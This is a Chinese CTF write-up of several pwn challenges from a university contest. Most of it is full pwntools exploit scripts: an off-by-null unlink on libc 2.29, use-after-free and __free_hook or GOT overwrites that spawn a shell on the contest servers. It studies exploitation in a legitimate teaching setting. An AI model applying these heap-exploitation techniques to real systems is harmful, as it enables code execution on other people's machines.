
中国海洋大学信息安全竞赛pwn

作者: cnitlrt | 来源:发表于2020-05-17 21:05 被阅读0次
这里首先记录一下love_river

题目给了libc文件,通过命令:

strings libc.so.6 |grep glibc

即可查看libc的版本


2.png

可以看到libc版本为2.29。通过IDA静态分析还可以看到：edit时存在off-by-null，且edit只能使用一次；show功能也只能使用一次；此外，add时会输出chunk块的地址。


3.png
4.png

因为程序中存在着off by null因此我们想到的是unlink的操作,但是在libc2.29下unlink新增了一个检查,需要我们绕过

if (!prev_inuse(p)) {
      prevsize = prev_size (p);
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      if (__glibc_unlikely (chunksize(p) != prevsize))  //new
        malloc_printerr ("corrupted size vs. prev_size while consolidating");
      unlink_chunk (av, p);
    }

可以看到这里检查了要释放堆块的prevsize和将要合并的堆块的size是否相等,不相等就crash,因此我们需要伪造一个堆块,具体操作为:

1.申请堆块A,B,C
2.在A中伪造一个fakechunk,size的大小为fake_chunk和chunk B的和,用来bypass这个新的检查,fd和bk指向自身,fd->bk=bk->fd=p
3.释放堆块c,unlink fakechunk+B+C,申请回来fakechunk和chunkB,此时造成了堆重叠,得到了两个B

因为程序直接给了libc文件,因此可以直接patchelf
patchelf安装:

sudo apt install patchelf

patchelf命令:

patchelf --set-interpreter <./ld文件> <bin文件>

例如:

patchelf --set-interpreter ./ld-linux-x86-64.so.2 ./love_river

然后再设置rpath（--set-rpath 的参数是以冒号分隔的目录列表，动态链接器会在这些目录中查找 libc.so.6）:

patchelf --set-rpath <路径>:<指定的libc文件> <bin文件>

例如:

patchelf --set-rpath ~/:/libc.so.6 ./love_river

查看一下:

m.png
ok完美 1.jpeg

原本按照正常的剧本就可以安安心心的做题了,but...

s.png

输入了size直接crash,直到笔者编写这篇文章的时候还没有解决,那我最后是咋做题的呢?


11.jpeg

我只能打开尘封已久的ubuntu19了,但是应该是系统原因,计算偏移也花费了好长时间,心累。。。
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
# from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

# Challenge binary plus the libc shipped with it; context.binary lets pwntools
# pick arch/endianness from the ELF header.
binary = 'love_river'
elf = ELF(binary)
libc = ELF("./libc.so.6")
context.binary = binary

# DEBUG = 1 spawns the binary locally, otherwise talk to the contest server.
DEBUG = 0
if not DEBUG:
    host = "118.190.133.9"
    port = 11000
    p = remote(host, port)
else:
    p = process(binary)


def l64():
    """Read through the next 0x7f byte and unpack the preceding six bytes as a
    little-endian 64-bit value (zero-padded to eight bytes).

    Written for Python 2 str semantics: on Python 3 the str pad handed to
    bytes.ljust raises TypeError.
    """
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """32-bit counterpart of l64: read through 0xf7 and unpack the last four bytes."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt `a`, then send `b` plus a newline (both str()-coerced)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt `a`, then send `b` without a trailing newline."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `data` as a hex value labelled `name` through pwntools' success()."""
    return p.success(name + (": 0x%x" % data))


def se(payload):
    """Raw send."""
    return p.send(payload)


def sl(payload):
    """Raw send with a trailing newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the str()-coerced delimiter `a` appears."""
    return p.recvuntil(str(a))
def choice(idx):
    """Answer the "choice:" menu prompt with option number `idx`."""
    p.sendlineafter("choice:", str(idx))
def add(size, payload):
    """Menu option 1: create an entry of `size` bytes holding `payload`."""
    answers = (("choice:", 1), ("Size of info:", size), ("Info:", payload))
    for prompt, value in answers:
        p.sendlineafter(prompt, str(value))
def edit(idx, payload):
    """Menu option 4: overwrite entry `idx` with `payload`."""
    answers = (("choice:", 4), ("index:\n", idx), ("Info:\n", payload))
    for prompt, value in answers:
        p.sendlineafter(prompt, str(value))
def show(idx):
    """Menu option 2: print entry `idx`."""
    p.sendlineafter("choice:", "2")
    p.sendlineafter("index:\n", str(idx))
def free(idx):
    """Menu option 3: release entry `idx`."""
    p.sendlineafter("choice:", "3")
    p.sendlineafter("index:\n", str(idx))
def edit1(idx, payload):
    """Menu option 6: the second edit path, same prompts as edit()."""
    answers = (("choice:", 6), ("index:\n", idx), ("Info:\n", payload))
    for prompt, value in answers:
        p.sendlineafter(prompt, str(value))
# --- Stage 1: heap grooming and a heap-address leak -------------------------
# Ten 0xf8-byte entries, freed in the order below; the trailing "#7/#8/#9"
# comments are the author's running count of freed entries.
for i in range(10):
    add(0xf8,"aaaa")
for i in range(5):
    free(i)
free(8)
free(9) 
free(5)#7
free(6)#8
free(7)#9
# Re-allocate all ten with seven filler bytes. The write-up notes that add()
# prints the chunk address, so the leak is parsed straight off that output.
for i in range(10):
    add(0xf8,"a"*0x7)
ru("0x")
heap_addr = int(p.recv(12),16)  # expects exactly twelve hex digits; ValueError otherwise
lg("heap_addr",heap_addr)
# --- Stage 2: libc leak ------------------------------------------------------
# Free seven entries and show entry 8. The subtracted constants are specific
# to the libc 2.29 build shipped with the task (presumably a main_arena-relative
# offset; the author mentions recomputing offsets on another system was slow).
for i in range(7):
    free(i)
show(8)
libc_base = l64()-96-0x10-0x1e4c30
lg("libc_base",libc_base)
free_hook = libc_base+libc.sym["__free_hook"]
sys_addr = libc.sym["system"]+libc_base
# --- Stage 3: fake chunk + off-by-null, as described in the write-up --------
# p64(0), p64(0x1f1), then two copies of heap_addr-0x200: per step 2 of the
# write-up this is the fake chunk header whose size spans fake_chunk + B, with
# fd/bk pointing back at itself.
payload = p64(0)+p64(0x1f1)
edit(7,payload+p64(heap_addr-0x200)+p64(heap_addr-0x200))
# edit1 (menu 6) is used exactly once; presumably the one-shot edit with the
# off-by-null the write-up describes. Python 2 only: str + bytes is a TypeError
# on Python 3.
edit1(8,"a"*0xf0+p64(0x1f0))
free(9)  # step 3 of the write-up: freeing C triggers the consolidation/unlink
add(0xf8-0x10,"a")#0
for i in range(8):
    add(0xf8,"/bin/sh")
# --- Stage 4: point __free_hook at system ------------------------------------
free(1)
free(10)
edit(8,p64(free_hook))  # entry 8 is one of the two overlapping "B" entries (write-up step 3)
add(0xf8,"aaa")
add(0xf8,p64(sys_addr))  # presumably this second allocation is served at __free_hook
free(4)  # entry 4 presumably holds "/bin/sh" from the loop above, so free() -> system()
# gdb.attach(p)
p.interactive()
a.png

flag:

flag{1F_y0u_c0m3_b4cK_wOuLd_y0u_l0ve_m3?}

剩下的几个pwn题没有太大的难度了,直接给出exp:

A+B Problem:

仿照的网鼎杯出的题:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
context.log_level = 'debug'

# Challenge binary and the libc-2.27 it ships with; context.binary sets the
# pwntools arch from the ELF header.
binary = 'pwnaaa'
elf = ELF(binary)
libc = ELF("./libc-2.27.so")
context.binary = binary

# DEBUG = 1 runs locally with the shipped libc preloaded, otherwise connect
# to the contest server.
DEBUG = 0
if not DEBUG:
    host = "118.190.133.9"
    port = 11004
    p = remote(host, port)
else:
    p = process(binary, env={"LD_PRELOAD": "./libc-2.27.so"})

# Offsets kept from the author's template; not referenced elsewhere in this script.
o_g = [0x4f2c5, 0x4f322, 0x10a38c]


def l64():
    """Read through the next 0x7f byte and unpack the preceding six bytes as a
    little-endian 64-bit value (zero-padded to eight bytes).

    Written for Python 2 str semantics: on Python 3 the str pad handed to
    bytes.ljust raises TypeError.
    """
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """32-bit counterpart of l64: read through 0xf7 and unpack the last four bytes."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt `a`, then send `b` plus a newline (both str()-coerced)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt `a`, then send `b` without a trailing newline."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `data` as a hex value labelled `name` through pwntools' success()."""
    return p.success(name + (": 0x%x" % data))


def se(payload):
    """Raw send."""
    return p.send(payload)


def sl(payload):
    """Raw send with a trailing newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the str()-coerced delimiter `a` appears."""
    return p.recvuntil(str(a))
# C source submitted to the service as a single line; per the write-up the task
# mimics a 网鼎杯 challenge, so presumably the remote compiles and runs what it
# receives. All constants are hard-coded for the task's libc-2.27: 0x3ed8e8 and
# 0x4f440 are the same __free_hook / system offsets the Note exploit below uses,
# and 0x551fd8 is the stack-to-libc distance the author measured. Note that the
# program stores pointer values in `int` variables, so it depends entirely on
# the compiler/ABI the remote happens to use.
payload = """
int main(){
int a;
int b;
int *free_hook;
int base;
int one;
char *buf;
b = &a;
base = b - 0x551fd8;
free_hook = 0x3ed8e8+base;
one = base+0x4f440;
*free_hook = one;
free("/bin/sh");
}
"""
# p.recv()
# gdb.attach(p)
# Newlines are flattened to spaces because the service reads one line of input.
payload = payload.replace("\n"," ")
p.sendline(payload)
p.interactive()

flag:

flag{A001_A+B_H4ck_pr0bl3m}
Note:

这题还是不错的,但是Aidai师傅说放错了题,这题简单了,确实有点白给了
off by null然后unlink
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

# Challenge binary; libc is whatever pwntools resolves for it locally
# (elf.libc), so the hard-coded libc offsets used later only match that build.
binary = 'Note'
elf = ELF(binary)
libc = elf.libc
context.binary = binary

# DEBUG = 1 as committed: this runs the binary locally rather than against
# the contest server.
DEBUG = 1
if not DEBUG:
    host = "118.190.133.9"
    port = 11001
    p = remote(host, port)
else:
    p = process(binary)

# Offsets kept from the author's template; not referenced elsewhere in this script.
o_g = [0x4f2c5, 0x4f322, 0x10a38c]


def l64():
    """Read through the next 0x7f byte and unpack the preceding six bytes as a
    little-endian 64-bit value (zero-padded to eight bytes).

    Written for Python 2 str semantics: on Python 3 the str pad handed to
    bytes.ljust raises TypeError.
    """
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """32-bit counterpart of l64: read through 0xf7 and unpack the last four bytes."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt `a`, then send `b` plus a newline (both str()-coerced)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt `a`, then send `b` without a trailing newline."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `data` as a hex value labelled `name` through pwntools' success()."""
    return p.success(name + (": 0x%x" % data))


def se(payload):
    """Raw send."""
    return p.send(payload)


def sl(payload):
    """Raw send with a trailing newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the str()-coerced delimiter `a` appears."""
    return p.recvuntil(str(a))
def choice(idx):
    """Answer the "choice" menu prompt with option number `idx`."""
    p.sendlineafter("choice", str(idx))
def add():
    """Menu option 1: create a new note (this binary takes no size or content)."""
    p.sendlineafter("choice", "1")
def free(idx):
    """Menu option 3: release note `idx`."""
    p.sendlineafter("choice", "3")
    p.sendlineafter("index:\n", str(idx))
def show(idx):
    """Menu option 2: print note `idx`."""
    p.sendlineafter("choice", "2")
    p.sendlineafter("index:\n", str(idx))
def edit(idx, payload):
    """Menu option 4: overwrite note `idx` with `payload`."""
    answers = (("choice", 4), ("index:\n", idx), ("Content:\n", payload))
    for prompt, value in answers:
        p.sendlineafter(prompt, str(value))

# --- Stage 1: heap grooming ---------------------------------------------------
# Ten notes, freed in the order below; the trailing "#7/#8/#9" comments are the
# author's running count of freed entries.
for i in range(10):
    add()
for i in range(5):
    free(i)
free(8)
free(9) 
free(5)#7
free(6)#8
free(7)#9
for i in range(10):
    add()
for i in range(7):
    free(i)
free(7)
# 0x1f0 bytes of filler followed by 0x400: per the write-up this is the
# off-by-null-then-unlink step (the trailing value lands where the next chunk's
# size/prev_size fields sit). Python 2 only: str + bytes is a TypeError on 3.
edit(8,"a"*0x1f0+p64(0x200+0x200))
free(9)
for i in range(7):
    add()
add()#7
# --- Stage 2: libc leak ------------------------------------------------------
# The constants below (0x3ebca0, 0x3ed8e8, 0x4f440) are hard-coded for one
# libc-2.27 build; with DEBUG = 1 the script runs against the local elf.libc,
# so they only hold if that is the same build.
show(8)
libc_base = l64()-0x3ebca0
lg("libc_base",libc_base)
free_hook = 0x3ed8e8+libc_base
sys_addr = 0x4f440+libc_base
# --- Stage 3: redirect __free_hook to system ---------------------------------
add()
free(0)
free(8)
# add()
edit(9,p64(free_hook))  # note 9 presumably overlaps a freed note ("two B" in the write-up)
# Two allocations sent directly; each is equivalent to add().
sla("choice","1")
sla("choice","1")
edit(8,p64(sys_addr))  # presumably note 8 is now backed by __free_hook
edit(1,"/bin/sh\x00")
free(1)  # free() on "/bin/sh" -> system() once the hook is set
# gdb.attach(p)
p.interactive()

flag:

flag{T3nCent_N3ws_s4id_On3Note_v3ry_ha0shi}
Newwave:

uaf漏洞打存有数组指针的地方:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author tag kept as module metadata (the conventional dunder name is __author__).
__Author__ = 'cnitlrt'
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

# Challenge binary; libc is whatever pwntools resolves for it locally
# (elf.libc). context.binary sets the pwntools arch from the ELF header.
binary = './New_Wave'
elf = ELF(binary)
libc = elf.libc
context.binary = binary
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})

# DEBUG = 1 spawns the binary locally, otherwise talk to the contest server.
DEBUG = 0
if not DEBUG:
    host = "118.190.133.9"
    port = 11002
    p = remote(host, port)
else:
    p = process(binary)

# Offset tables kept from the author's template; neither is referenced
# elsewhere in this script.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc, free, realloc, system


def l64():
    """Read through the next 0x7f byte and unpack the preceding six bytes as a
    little-endian 64-bit value (zero-padded to eight bytes).

    Written for Python 2 str semantics: on Python 3 the str pad handed to
    bytes.ljust raises TypeError.
    """
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """32-bit counterpart of l64: read through 0xf7 and unpack the last four bytes."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt `a`, then send `b` plus a newline (both str()-coerced)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt `a`, then send `b` without a trailing newline."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `data` as a hex value labelled `name` through pwntools' success()."""
    return p.success(name + (" => 0x%x" % data))


def se(payload):
    """Raw send."""
    return p.send(payload)


def sl(payload):
    """Raw send with a trailing newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the str()-coerced delimiter `a` appears."""
    return p.recvuntil(str(a))
def choice(idx):
    """Answer the "Input your choice:" prompt with option number `idx`."""
    p.sendlineafter("Input your choice:\n", str(idx))
def add(size):
    """Menu option 1: allocate an entry of `size` bytes."""
    p.sendlineafter("Input your choice:\n", "1")
    p.sendlineafter("Size:\n", str(size))
def show(idx):
    """Menu option 2: print entry `idx`."""
    p.sendlineafter("Input your choice:\n", "2")
    p.sendlineafter("index:\n", str(idx))
def free(idx):
    """Menu option 4: release entry `idx` (the index stays usable afterwards,
    which is the UAF the write-up relies on)."""
    p.sendlineafter("Input your choice:\n", "4")
    p.sendlineafter("index:\n", str(idx))
def edit(idx, payload):
    """Menu option 3: write `payload` into entry `idx`.

    The content is sent with sendafter (no trailing newline), unlike the
    index and menu number.
    """
    p.sendlineafter("Input your choice:\n", "3")
    p.sendlineafter("index:\n", str(idx))
    p.sendafter("Info:\n", str(payload))
# Two 0x68-byte entries; entry 0 is freed and then edited (write-after-free).
# The write-up says the UAF is aimed at the place where the array pointers
# are kept; 0x6020ad is presumably an address inside that region of this
# non-PIE binary (elf.got values are used as absolute addresses below).
add(0x68)#0
add(0x68)#1
free(0)
edit(0,p64(0x6020ad))
add(0x68)
add(0x68)
# Entry 3 presumably overlaps the pointer table: after this write, entry 1
# appears to point at free@got and entry 2 at atoi@got. Python 2 only: the
# str + bytes concatenation is a TypeError on Python 3.
edit(3,"a"*0x3+p64(0x0000006800000068)*2+p64(0)*2+p64(elf.got["free"])*2+p64(elf.got["atoi"])+p64(0x6020bd))
# Leak free()'s libc address through entry 1 and derive the base.
show(1)
libc_base = l64()-libc.sym["free"]
lg("libc_base",libc_base)
sys_addr = libc.sym["system"]+libc_base
# Presumably overwrites atoi@got with system; the interactive session then
# supplies the next menu input.
edit(2,p64(sys_addr))
# gdb.attach(p)
p.interactive()

flag:

flag{Surg3_0n_y0ung_g3ner4tion5_A_tuberosum_Rottl_ex_Spreng}
Y.J.Aickson's Calculator

劫持v5为0x1BF52,然后同时需要v8不等于0x1BF52
exp:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Author tag kept as module metadata (the conventional dunder name is __author__).
__Author__ = 'cnitlrt'
import sys
import os
from pwn import *
from LibcSearcher import LibcSearcher
#context.log_level = 'debug'

# Challenge binary; libc is whatever pwntools resolves for it locally
# (elf.libc). context.binary sets the pwntools arch from the ELF header.
binary = 'aaa'
elf = ELF(binary)
libc = elf.libc
context.binary = binary
# p=process(binary,env={"LD_PRELOAD":"./libc-2.27.so"})

# DEBUG = 1 spawns the binary locally, otherwise talk to the contest server.
DEBUG = 0
if not DEBUG:
    host = "pwn.iostream.site"
    port = 2333
    p = remote(host, port)
else:
    p = process(binary)

# Offset tables kept from the author's template; neither is referenced
# elsewhere in this script.
o_g = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
magic = [0x3c4b10, 0x3c67a8, 0x846c0, 0x45390]  # malloc, free, realloc, system


def l64():
    """Read through the next 0x7f byte and unpack the preceding six bytes as a
    little-endian 64-bit value (zero-padded to eight bytes).

    Written for Python 2 str semantics: on Python 3 the str pad handed to
    bytes.ljust raises TypeError.
    """
    tail = p.recvuntil("\x7f")[-6:]
    return u64(tail.ljust(8, "\x00"))


def l32():
    """32-bit counterpart of l64: read through 0xf7 and unpack the last four bytes."""
    tail = p.recvuntil("\xf7")[-4:]
    return u32(tail.ljust(4, "\x00"))


def sla(a, b):
    """Wait for prompt `a`, then send `b` plus a newline (both str()-coerced)."""
    return p.sendlineafter(str(a), str(b))


def sa(a, b):
    """Wait for prompt `a`, then send `b` without a trailing newline."""
    return p.sendafter(str(a), str(b))


def lg(name, data):
    """Log `data` as a hex value labelled `name` through pwntools' success()."""
    return p.success(name + (" => 0x%x" % data))


def se(payload):
    """Raw send."""
    return p.send(payload)


def sl(payload):
    """Raw send with a trailing newline."""
    return p.sendline(payload)


def ru(a):
    """Receive until the str()-coerced delimiter `a` appears."""
    return p.recvuntil(str(a))
# Drain whatever the service has printed so far, then answer the two operand
# prompts and the operator prompt without waiting for each one (no recvuntil
# in between, so this relies on the service reading them in order).
p.recv()
p.sendline("1")
p.sendline("2")
# The operator line carries the packed constant from the write-up: v5 must
# become 0x1BF52 while v8 must differ from it. Python 2 only: str + bytes is
# a TypeError on Python 3.
p.sendline("+"+p64(0x1BF52))
# gdb.attach(p)
p.interactive()

flag:

flag{wh1t3_g1v3_stAck_0v3rf10w!}
Pwn_WarmUp

签到题,没啥好说的,连上就有
flag:

flag{Welc0m3_to_my_Pwn_w0r1d!}
